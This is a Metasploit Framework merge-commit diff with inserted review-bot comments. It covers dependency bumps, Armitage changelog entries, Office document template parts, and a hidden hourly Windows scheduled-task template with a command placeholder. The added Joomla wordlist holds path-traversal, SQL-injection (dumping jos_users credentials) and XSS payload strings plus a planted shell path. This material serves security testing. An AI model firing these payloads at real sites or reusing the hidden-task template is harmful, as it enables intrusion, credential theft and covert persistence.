Merge branch 'master' of github.com:rapid7/metasploit-framework into rapid7

bug/bundler_fix
James Lee 2013-02-21 15:30:43 -06:00
commit c423ad2583
283 changed files with 12005 additions and 1278 deletions


@ -1,4 +1,8 @@
language: ruby
before_install:
- sudo apt-get update -qq
- sudo apt-get install -qq libpcap-dev
rvm:
#- '1.8.7'
- '1.9.3'
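Review bot: the new before_install step pulls in libpcap-dev, which the pcaprub gem added to the Gemfile in this same change needs to compile, but the commented-out `#- '1.8.7'` entry under rvm is left behind as dead configuration. Either delete it or add a one-line comment stating that 1.8.7 is no longer tested, so a reader does not assume it was dropped by accident.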
@ -6,3 +10,5 @@ rvm:
notifications:
irc: "irc.freenode.org#msfnotify"
git:
depth: 1
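Review bot: `depth: 1` turns the CI checkout into a shallow clone, so anything in the test run that inspects history (git describe, log-derived version strings) will only ever see the commit under test. That is fine for build speed, but a short comment beside the setting would save the next person from debugging a surprising history-dependent failure.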

Gemfile

@ -4,10 +4,20 @@ source 'http://rubygems.org'
gem 'activesupport', '>= 3.0.0'
# Needed for Msf::DbManager
gem 'activerecord'
# Needed for some admin modules (scrutinizer_add_user.rb)
gem 'json'
# Database models shared between framework and Pro.
gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.3.0'
gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.4.0'
# Needed by msfgui and other rpc components
gem 'msgpack'
# Needed by anemone crawler
gem 'nokogiri'
# Needed for module caching in Mdm::ModuleDetails
gem 'pg', '>= 0.11'
# Needed by anemone crawler
gem 'robots'
# For sniffer and raw socket modules
gem 'pcaprub'
group :development do
# Markdown formatting for yard
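Review bot: metasploit_data_models is fetched over `git://`, which is neither authenticated nor encrypted, and is pinned to a tag (`:tag => '0.4.0'`) rather than a commit; a tag can be moved on the remote, so only the revision recorded in Gemfile.lock actually fixes what gets installed. Prefer an `https://github.com/...` URL and pin with `:ref => '448c1065329efea1eac76a3897f626f122666743'` (the revision the lock already records). Separately, `gem 'pcaprub'` needs the libpcap headers to build; the .travis.yml change covers CI, but a developer running `bundle install` on a fresh machine gets no hint, so a comment naming the libpcap-dev requirement next to the gem line would help.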


@ -1,10 +1,10 @@
GIT
remote: git://github.com/rapid7/metasploit_data_models.git
revision: 73f26789500f278dd6fd555e839d09a3b81a05f4
tag: 0.3.0
revision: 448c1065329efea1eac76a3897f626f122666743
tag: 0.4.0
specs:
metasploit_data_models (0.3.0)
activerecord
metasploit_data_models (0.4.0)
activerecord (>= 3.2.10)
activesupport
pg
pry
@ -12,15 +12,15 @@ GIT
GEM
remote: http://rubygems.org/
specs:
activemodel (3.2.9)
activesupport (= 3.2.9)
activemodel (3.2.11)
activesupport (= 3.2.11)
builder (~> 3.0.0)
activerecord (3.2.9)
activemodel (= 3.2.9)
activesupport (= 3.2.9)
activerecord (3.2.11)
activemodel (= 3.2.11)
activesupport (= 3.2.11)
arel (~> 3.0.2)
tzinfo (~> 0.3.29)
activesupport (3.2.9)
activesupport (3.2.11)
i18n (~> 0.6)
multi_json (~> 1.0)
arel (3.0.2)
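Review bot: the lock moves activemodel, activerecord and activesupport from 3.2.9 to 3.2.11, but the Gemfile still declares `activesupport '>= 3.0.0'` and `activerecord` with no floor at all, so the 3.2.11 floor exists only in Gemfile.lock; metasploit_data_models 0.4.0 itself only requires `activerecord (>= 3.2.10)` (first hunk of this file). Raise the Gemfile constraints to at least `>= 3.2.11` (or `~> 3.2.11`) so that anyone who regenerates the lock cannot silently resolve back to an older 3.2.x release.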
@ -28,8 +28,12 @@ GEM
coderay (1.0.8)
diff-lcs (1.1.3)
i18n (0.6.1)
json (1.7.7)
method_source (0.8.1)
msgpack (0.5.2)
multi_json (1.0.4)
nokogiri (1.5.6)
pcaprub (0.11.3)
pg (0.14.1)
pry (0.9.10)
coderay (~> 1.0.5)
@ -37,6 +41,7 @@ GEM
slop (~> 3.3.1)
rake (10.0.2)
redcarpet (2.2.2)
robots (0.10.1)
rspec (2.12.0)
rspec-core (~> 2.12.0)
rspec-expectations (~> 2.12.0)
@ -59,10 +64,15 @@ PLATFORMS
DEPENDENCIES
activerecord
activesupport (>= 3.0.0)
json
metasploit_data_models!
msgpack
nokogiri
pcaprub
pg (>= 0.11)
rake
redcarpet
robots
rspec (>= 2.12)
simplecov (= 0.5.4)
yard

Binary file not shown.

Binary file not shown.


@ -1,6 +1,55 @@
Armitage Changelog
==================
12 Feb 13 (tested against msf 16438)
---------
- Fixed a corner case preventing the display of removed host labels
when connected to a team server.
- Fixed RPC call cache corruption in team server mode. This bug could
lead to some exploits defaulting to a shell payload when meterpreter
was a possibility.
- Slight optimization to some DB queries. I no longer pull unused
fields making the query marginally faster. Team server is more
efficient too as changes to unused fields won't force data (re)sync.
- Hosts -> Clear Database now clears host labels too.
- Added the ability to manage multiple team server instances through
Armitage. Go to Armitage -> New Connection to connect to another
server. A button bar will appear that allows you to switch active
Armitage connections.
- Credentials available across instances are pooled when using
the [host] -> Login menu and the credential helper.
- Rewrote the event log management code in the team server
- Added nickname tab completion to event log. I feel like I'm writing
an IRC client again.
- Hosts -> Clear Database now asks you to confirm the action.
- Hosts -> Import Hosts announces successful import to event log again.
23 Jan 13 (tested against msf 16351)
---------
- Added helpers to set EXE::Custom and EXE::Template options.
- Fixed a bug displaying a Windows 8 icon for Windows 2008 hosts
- Cleaned up Armitage -> SOCKS Proxy job management code. The code to
check if a proxy server is up was deadlock prone. Removed it.
- Starting SOCKS Proxy module now opens a tab displaying the module
start process. An event is posted to the event log too.
- Created an option helper to select credentials for SMBUser, SMBPass,
USERNAME, and PASSWORD.
- Added a feature to label hosts. A label will show up in its own column
in table view or below all info in graph view. Any team member may
change a label through [host] -> host -> Set Label. You may also use
dynamic workspaces to show hosts with certain labels attached.
- Fixed bad things happening when connecting Armitage to 'localhost' and
not '127.0.0.1'.
- Screenshots and Webcam shots are now centered in their tab.
- Added an alternate .bat file to start msfrpcd on Windows in the
Metasploit 4.5 installer's environment.
- Added a color-style for [!] warning messages
Cortana Updates (for scripters)
--------
- &handler function now works as advertised.
- Cortana now avoids use of core.setg
4 Jan 13 (tested against msf 16252)
--------
- Added a helper to set REXE option

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.


@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/><Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/><Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/><Override PartName="/word/webSettings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/></Types>


@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships>


@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template>normal.dot</Template><TotalTime>0</TotalTime><Pages>1</Pages><Words>0</Words><Characters>3</Characters><Application>Microsoft Office Outlook</Application><DocSecurity>0</DocSecurity><Lines>0</Lines><Paragraphs>0</Paragraphs><ScaleCrop>false</ScaleCrop><Company></Company><LinksUpToDate>false</LinksUpToDate><CharactersWithSpaces>0</CharactersWithSpaces><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>12.0000</AppVersion></Properties>
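Review bot: the docProps/app.xml part carries producer metadata that is internally inconsistent (`<Characters>3</Characters>` alongside `<Words>0</Words>` and `<CharactersWithSpaces>0</CharactersWithSpaces>`, and `<Application>Microsoft Office Outlook</Application>` on a WordprocessingML document). Every file built from this template inherits these values, together with the fixed rsid values in document.xml and settings.xml, so they amount to a stable fingerprint for anything generated from it. Whichever module consumes the template should say so in a comment, so the behaviour is documented rather than accidental; the file paths are not shown in this rendering, so the template's location in the tree cannot be checked here.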


@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/></Relationships>


@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:document xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml"><w:body><w:p w:rsidR="00E97639" w:rsidRDefault="00E97639"><w:r><w:t> </w:t></w:r></w:p><w:sectPr w:rsidR="00E97639" w:rsidSect="00B25E88"><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/><w:cols w:space="720"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document>


@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:fonts xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:font w:name="Times New Roman"><w:panose1 w:val="02020603050405020304"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="20002A87" w:usb1="80000000" w:usb2="00000008" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/></w:font><w:font w:name="Cambria"><w:panose1 w:val="02040503050406030204"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="A00002EF" w:usb1="4000004B" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009F" w:csb1="00000000"/></w:font><w:font w:name="Calibri"><w:panose1 w:val="020F0502020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="A00002EF" w:usb1="4000207B" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009F" w:csb1="00000000"/></w:font></w:fonts>


@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:settings xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main"><w:zoom w:percent="100"/><w:embedSystemFonts/><w:attachedTemplate r:id="rId1"/><w:defaultTabStop w:val="720"/><w:characterSpacingControl w:val="doNotCompress"/><w:doNotValidateAgainstSchema/><w:doNotDemarcateInvalidXml/><w:compat><w:useNormalStyleForList/><w:doNotUseIndentAsNumberingTabStop/><w:useAltKinsokuLineBreakRules/><w:allowSpaceOfSameStyleInTable/><w:doNotSuppressIndentation/><w:doNotAutofitConstrainedTables/><w:autofitToFirstFixedWidthCell/><w:underlineTabInNumList/><w:displayHangulFixedWidth/><w:splitPgBreakAndParaMark/><w:doNotVertAlignCellWithSp/><w:doNotBreakConstrainedForcedTable/><w:doNotVertAlignInTxbx/><w:useAnsiKerningPairs/><w:cachedColBalance/></w:compat><w:rsids><w:rsidRoot w:val="00B25E88"/><w:rsid w:val="00890656"/><w:rsid w:val="00B25E88"/><w:rsid w:val="00E97639"/></w:rsids><m:mathPr><m:mathFont m:val="Cambria Math"/><m:brkBin m:val="before"/><m:brkBinSub m:val="--"/><m:smallFrac m:val="off"/><m:dispDef/><m:lMargin m:val="0"/><m:rMargin m:val="0"/><m:defJc m:val="centerGroup"/><m:wrapIndent m:val="1440"/><m:intLim m:val="subSup"/><m:naryLim m:val="undOvr"/></m:mathPr><w:uiCompat97To2003/><w:themeFontLang w:val="en-US"/><w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" w:followedHyperlink="followedHyperlink"/><w:doNotIncludeSubdocsInStats/><w:doNotAutoCompressPictures/><w:decimalSymbol w:val="."/><w:listSeparator w:val=","/></w:settings>
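Review bot: settings.xml declares `<w:attachedTemplate r:id="rId1"/>`, and that identifier resolves against word/_rels/settings.xml.rels, not the document.xml.rels shown earlier in this change (where rId1 is the styles part). No settings.xml.rels appears among the parts in this commit, so either it is one of the suppressed diffs or the reference dangles. Confirm the part is present, or drop the attachedTemplate element if no template link is needed.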

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long


@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:webSettings xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:optimizeForBrowser/></w:webSettings>


@ -0,0 +1,50 @@
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<RegistrationInfo>
<Date>DATEHERE</Date>
<Author>USERHERE</Author>
</RegistrationInfo>
<Triggers>
<TimeTrigger>
<Repetition>
<Interval>PT60M</Interval>
<StopAtDurationEnd>false</StopAtDurationEnd>
</Repetition>
<StartBoundary>DATEHERE</StartBoundary>
<Enabled>true</Enabled>
</TimeTrigger>
</Triggers>
<Principals>
<Principal id="Author">
<UserId>DOMAINHERE</UserId>
<LogonType>S4U</LogonType>
<RunLevel>LeastPrivilege</RunLevel>
</Principal>
</Principals>
<Settings>
<MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
<AllowHardTerminate>true</AllowHardTerminate>
<StartWhenAvailable>false</StartWhenAvailable>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<Duration>PT10M</Duration>
<WaitTimeout>PT1H</WaitTimeout>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>true</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>PT72H</ExecutionTimeLimit>
<Priority>7</Priority>
</Settings>
<Actions Context="Author">
<Exec>
<Command>COMMANDHERE</Command>
</Exec>
</Actions>
</Task>
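Review bot: the XML declaration says `encoding="UTF-16"`, yet the file is committed as plain text and renders as such in this diff, so the code that fills in the placeholders must either write the result out as real UTF-16 (with a byte-order mark) or rewrite the declaration; otherwise Task Scheduler rejects the import as malformed XML. The placeholders themselves (`DATEHERE`, `USERHERE`, `DOMAINHERE`, `COMMANDHERE`) are substituted into element content, so the consumer has to XML-escape the values, in particular `COMMANDHERE`, since a path containing `&` or `<` would otherwise break the document. Note also that `DATEHERE` is used for both `<Date>` and `<StartBoundary>`; that is fine if both are meant to be the creation time, but worth a comment.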

Binary file not shown.


@ -1,20 +0,0 @@
class AddCredFileTable < ActiveRecord::Migration
def self.up
create_table :cred_files do |t|
t.integer :workspace_id, :null => false, :default => 1
t.string :path, :limit => 1024
t.string :ftype, :limit => 16
t.string :created_by
t.string :name, :limit => 512
t.string :desc, :limit => 1024
t.timestamps
end
end
def self.down
drop_table :cred_files
end
end
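Review bot: deleting the AddCredFileTable migration outright, rather than shipping a migration that reverses it, leaves existing databases with the `cred_files` table and a schema_migrations row for a version that no longer exists in this tree. Presumably the migration moved into metasploit_data_models 0.4.0 along with the Gemfile bump in this commit; confirm the gem carries it under the same version timestamp so `rake db:migrate` does not try to create the table a second time, and say so in the commit message.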

data/wordlists/joomla.txt Executable file

@ -0,0 +1,627 @@
&controller=../../../../../../../../../../../../[LFI]%00
?1.5.10-x
?1.5.11-x-http_ref
?1.5.11-x-php-s3lf
?1.5.3-path-disclose
?1.5.3-spam
?1.5.8-x
?1.5.9-x
?j1012-fixate-session
?option=com_mysms&Itemid=0&task=phonebook
Joomla_1.6.0-Alpha2-Full-Package/components/com_mailto/assets/close-x.png
admin/
administrator/
administrator/components/
administrator/components/com_a6mambocredits/
administrator/components/com_a6mambohelpdesk/
administrator/components/com_admin/admin.admin.html.php
administrator/components/com_astatspro/refer.php
administrator/components/com_bayesiannaivefilter/
administrator/components/com_chronocontact/excelwriter/PPS/File.php
administrator/components/com_colophon/
administrator/components/com_colorlab/
administrator/components/com_comprofiler/
administrator/components/com_comprofiler/plugin.class.php
administrator/components/com_cropimage/admin.cropcanvas.php
administrator/components/com_extplorer/
administrator/components/com_feederator/includes/tmsp/add_tmsp.php
administrator/components/com_googlebase/
administrator/components/com_installer
administrator/components/com_jcs/
administrator/components/com_jim/
administrator/components/com_jjgallery/
administrator/components/com_joom12pic/
administrator/components/com_joomla-visites/
administrator/components/com_joomla_flash_uploader/
administrator/components/com_joomlaflashfun/
administrator/components/com_joomlaradiov5/
administrator/components/com_jpack/
administrator/components/com_jreactions/
administrator/components/com_juser/
administrator/components/com_admin/
administrator/components/com_kochsuite /
administrator/components/com_linkdirectory/
administrator/components/com_livechat/getSavedChatRooms.php
administrator/components/com_livechat/xmlhttp.php
administrator/components/com_lurm_constructor/admin.lurm_constructor.php
administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=lo.php");
administrator/components/com_mambelfish/
administrator/components/com_mgm/
administrator/components/com_mmp/help.mmp.php
administrator/components/com_mosmedia/
administrator/components/com_multibanners/extadminmenus.class.php
administrator/components/com_panoramic/
administrator/components/com_peoplebook/param.peoplebook.php
administrator/components/com_phpshop/toolbar.phpshop.html.php
administrator/components/com_remository/admin.remository.php
administrator/components/com_serverstat/install.serverstat.php
administrator/components/com_simpleswfupload/uploadhandler.php");
administrator/components/com_swmenupro/
administrator/components/com_treeg/
administrator/components/com_uhp/
administrator/components/com_uhp2/
administrator/components/com_webring/
administrator/components/com_wmtgallery/
administrator/components/com_wmtportfolio/
administrator/components/com_x-shop/
administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+
administrator/index.php?option=com_searchlog&act=log
ajaxim/
akocomments.php
cart?Itemid=[SQLi]
component/com__brightweblinks/
component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0
component/osproperty/?task=agent_register
component/quran/index.php?option=com_quran&action=viewayat&surano=
components/com_ clickheat/
components/com_5starhotels/
components/com_Jambook/jambook.php
components/com_a6mambocredits/
components/com_a6mambohelpdesk/
components/com_ab_gallery/
components/com_acajoom/
components/com_acctexp/
components/com_aclassf/
components/com_activities/
components/com_actualite/
components/com_admin/admin.admin.html.php
components/com_advancedpoll/
components/com_agora/
components/com_agoragroup/
components/com_ajaxchat/
components/com_akobook/
components/com_akocomment/
components/com_akogallery
components/com_alberghi/
components/com_allhotels/
components/com_alphacontent/
components/com_altas/
components/com_amocourse/
components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php
components/com_articles/
components/com_artist/
components/com_artlinks/
components/com_asortyment/
components/com_astatspro/
components/com_awesom/
components/com_babackup/
components/com_banners/
components/com_bayesiannaivefilter/
components/com_be_it_easypartner/
components/com_beamospetition/
components/com_biblestudy/
components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
components/com_blog/
components/com_bookflip/
components/com_bookjoomlas/
components/com_booklibrary/
components/com_books/
components/com_bsadv/
components/com_bsq_sitestats/
components/com_bsq_sitestats/external/rssfeed.php
components/com_bsqsitestats/
components/com_calendar/
components/com_camelcitydb2/
components/com_candle/
components/com_casino_blackjack/
components/com_casino_videopoker/
components/com_casinobase/
components/com_catalogproduction/
components/com_catalogshop/
components/com_category/
components/com_cgtestimonial/video.php?url="><script>alert('xss');</script>
components/com_chronocontact/excelwriter/PPS/File.php
components/com_cinema/
components/com_clasifier/
components/com_classifieds/
components/com_clickheat/
components/com_cloner/
components/com_cmimarketplace/
components/com_cms/
components/com_colophon/
components/com_colorlab/
components/com_competitions/
components/com_comprofiler/
components/com_comprofiler/plugin.class.php
components/com_contactinfo/
components/com_content/
components/com_cpg/cpg.php
components/com_cropimage/admin.cropcanvas.php
components/com_custompages/
components/com_cx/
components/com_d3000/
components/com_dadamail/
components/com_dailymessage/
components/com_datsogallery/
components/com_dbquery/
components/com_detail/
components/com_digistore/
components/com_directory/
components/com_djiceshoutbox/
components/com_doc/
components/com_downloads/
components/com_ds-syndicate/
components/com_dtregister/
components/com_dv/externals/phpupload/upload.php");
components/com_easybook/
components/com_emcomposer/
components/com_equotes/
components/com_estateagent/
components/com_eventing/
components/com_eventlist/
components/com_events/
components/com_ewriting/
components/com_expose/uploadimg.php
components/com_expshop/
components/com_extcalendar/
components/com_extcalendar/cal_popup.php?extmode=view&extid=
components/com_extcalendar/extcalendar.php
components/com_extended_registration/registration_detailed.inc.php
components/com_extplorer/
components/com_ezine/
components/com_ezstore/
components/com_facileforms/
components/com_fantasytournament/
components/com_faq/
components/com_feederator/includes/tmsp/add_tmsp.php
components/com_filebase/
components/com_filiale/
components/com_flashfun/
components/com_flashmagazinedeluxe/
components/com_flippingbook/
components/com_flyspray/startdown.php
components/com_fm/fm.install.php
components/com_foevpartners/
components/com_football/
components/com_formtool/
components/com_forum/
components/com_fq/
components/com_fundraiser/
components/com_galeria/
components/com_galleria/galleria.html.php
components/com_gallery/
components/com_game/
components/com_gameq/
components/com_garyscookbook/
components/com_genealogy/
components/com_geoboerse/
components/com_gigcal/
components/com_gmaps/
components/com_googlebase/
components/com_gsticketsystem/
components/com_guide/
components/com_hashcash/server.php
components/com_hbssearch/
components/com_hello_world/
components/com_hotproperties/
components/com_hotproperty/
components/com_hotspots/
components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php
components/com_hwdvideoshare/
components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1");
components/com_ice/
components/com_idoblog/
components/com_idvnews/
components/com_ignitegallery/
components/com_ijoomla_archive/
components/com_ijoomla_rss/
components/com_inter/
components/com_ionfiles/
components/com_is/
components/com_ixxocart/
components/com_jabode/
components/com_jashowcase/
components/com_jb2/
components/com_jce/
components/com_jcs/
components/com_jd-wiki/
components/com_jd-wp/
components/com_jim/
components/com_jjgallery/
components/com_jmovies/
components/com_jobline/
components/com_jombib/
components/com_joobb/
components/com_jooget/
components/com_joom12pic/
components/com_joomla-visites/
components/com_joomla_flash_uploader/
components/com_joomlaboard/
components/com_joomladate/
components/com_joomlaflashfun/
components/com_joomlalib/
components/com_joomlaradiov5/
components/com_joomlavvz/
components/com_joomlaxplorer/
components/com_joomloads/
components/com_joomradio/
components/com_joomtracker/
components/com_joovideo/
components/com_jotloader/
components/com_journal/
components/com_jpack/
components/com_jpad/
components/com_jreactions/
components/com_jreviews/scripts/xajax.inc.php
components/com_jumi/
components/com_juser/
components/com_jvideo/
components/com_k2/
components/com_kbase/
components/com_knowledgebase/fckeditor/fckeditor.js
components/com_kochsuite /
components/com_kunena/
components/com_letterman/
components/com_lexikon/
components/com_linkdirectory/
components/com_listoffreeads/
components/com_livechat/getSavedChatRooms.php
components/com_livechat/xmlhttp.php
components/com_liveticker/
components/com_lm/
components/com_lmo/
components/com_loudmounth/includes/abbc/abbc.class.php
components/com_loudmouth/
components/com_lowcosthotels/
components/com_lurm_constructor/admin.lurm_constructor.php
components/com_mad4joomla/
components/com_madeira/img.php
components/com_maianmusic/
components/com_mailarchive/
components/com_mailto/
components/com_mambatstaff/mambatstaff.php
components/com_mambelfish/
components/com_mambospgm/
components/com_mambowiki/MamboLogin.php
components/com_marketplace/
components/com_mcquiz/
components/com_mdigg/
components/com_media_library/
components/com_mediaslide/
components/com_mezun/
components/com_mgm/
components/com_minibb/
components/com_misterestate/
components/com_mmp/help.mmp.php
components/com_model/
components/com_moodle/moodle.php
components/com_moofaq/
components/com_mosmedia/
components/com_mospray/scripts/admin.php
components/com_mosres/
components/com_most/
components/com_mp3_allopass/
components/com_mtree/
components/com_mtree/img/listings/o/{id}.php
components/com_multibanners/extadminmenus.class.php
components/com_myalbum/
components/com_mycontent/
components/com_mydyngallery/
components/com_mygallery/
components/com_n-forms/
components/com_na_content/
components/com_na_mydocs/
components/com_na_newsdescription/
components/com_na_qforms/
components/com_neogallery/
components/com_neorecruit/
components/com_neoreferences/
components/com_netinvoice/
components/com_news/
components/com_news_portal/
components/com_newsflash/
components/com_nfn_addressbook/
components/com_nicetalk/
components/com_noticias/
components/com_omnirealestate/
components/com_omphotogallery/
components/com_ongumatimesheet20/
components/com_onlineflashquiz/
components/com_ownbiblio/
components/com_panoramic/
components/com_paxgallery/
components/com_paxxgallery/
components/com_pcchess/
components/com_pcchess/include.pcchess.php
components/com_pccookbook/
components/com_pccookbook/pccookbook.php
components/com_peoplebook/param.peoplebook.php
components/com_performs/
components/com_philaform/
components/com_phocadocumentation/
components/com_php/
components/com_phpshop/toolbar.phpshop.html.php
components/com_pinboard/
components/com_pms/
components/com_poll/
components/com_pollxt/
components/com_ponygallery/
components/com_portafolio/
components/com_portfol/
components/com_prayercenter/
components/com_pro_desk/
components/com_prod/
components/com_productshowcase/
components/com_profiler/
components/com_projectfork/
components/com_propertylab/
components/com_puarcade/
components/com_publication/
components/com_quiz/
components/com_rapidrecipe/
components/com_rdautos/
components/com_realestatemanager/
components/com_recly/
components/com_referenzen/
components/com_rekry/
components/com_remository/admin.remository.php
components/com_remository_files/file_image_14/1276100016shell.php
components/com_reporter/processor/reporter.sql.php
components/com_resman/
components/com_restaurante/
components/com_ricette/
components/com_rsfiles/
components/com_rsgallery/
components/com_rsgallery2/
components/com_rss/
components/com_rssreader/
components/com_rssxt/
components/com_rwcards/
components/com_school/
components/com_search/
components/com_sebercart/getPic.php?p=[LFD]%00
components/com_securityimages/
components/com_sef/
components/com_seminar/
components/com_serverstat/install.serverstat.php
components/com_sg/
components/com_simple_review/
components/com_simpleboard/
components/com_simplefaq/
components/com_simpleshop/
components/com_sitemap/sitemap.xml.php
components/com_slideshow/
components/com_smf/
components/com_smf/smf.php
components/com_swmenupro/
components/com_team/
components/com_tech_article/
components/com_thopper/
components/com_thyme/
components/com_tickets/
components/com_tophotelmodule/
components/com_tour_toto/
components/com_trade/
components/com_uhp/
components/com_uhp2/
components/com_user/controller.php
components/com_users/
components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php
components/com_vehiclemanager/
components/com_versioning /
components/com_videodb/core/videodb.class.xml.php
components/com_virtuemart/
components/com_volunteer/
components/com_vr/
components/com_waticketsystem/
components/com_webhosting/
components/com_weblinks/
components/com_webring/
components/com_wmtgallery/
components/com_wmtportfolio/
components/com_x-shop/
components/com_xevidmegahd/
components/com_xewebtv/
components/com_xfaq/
components/com_xgallery/helpers/img.php?file=
components/com_xsstream-dm/
components/com_ynews/
components/com_yvcomment/
components/com_zoom/classes/
components/mod_letterman/
components/remository/
eXtplorer/
easyblog/entry/uncategorized
extplorer/
components/com_mtree/img/listings/o/{id}.php where {id}
includes/joomla.php
index.php/404'
index.php/?option=com_question&catID=21' and+1=0 union all
index.php/image-gallery/"><script>alert('xss')</script>/25-koala
